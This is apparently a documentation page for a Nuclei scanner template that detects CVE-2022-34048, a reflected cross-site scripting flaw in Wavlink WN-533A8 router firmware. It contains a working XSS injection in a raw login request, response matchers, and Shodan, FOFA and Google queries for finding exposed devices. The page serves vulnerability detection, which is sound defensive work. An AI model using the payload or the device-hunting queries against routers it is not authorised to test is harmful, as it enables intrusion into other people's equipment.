Wavlink WN-533A8 - Cross-Site Scripting
ID: CVE-2022-34048
Severity: medium
Author: ritikchaddha
Tags: cve2022,cve,wavlink,xss,router,edb
Description
Section titled “Description”Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
YAML Source
Section titled “YAML Source”id: CVE-2022-34048
info: name: Wavlink WN-533A8 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50989 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 epss-score: 0.00107 epss-percentile: 0.43187 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn533a8_firmware shodan-query: - http.html:"Wavlink" - http.html:"wavlink" - http.title:"wi-fi app login" fofa-query: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve2022,cve,wavlink,xss,router,edb
http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 Host: {{Hostname}}
newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en
matchers-condition: and matchers: - type: word part: body words: - 'x");alert(9);x=("?login=0");</script>'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a0046304402204f26a87c4513c412942f3bc32c531f6ce445777a289991154722e5d63b62e45902206a49825f6fc76572e78e709fef58d9917baf86a2d3cc4c9b58ec843293842b70:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-34048.yaml"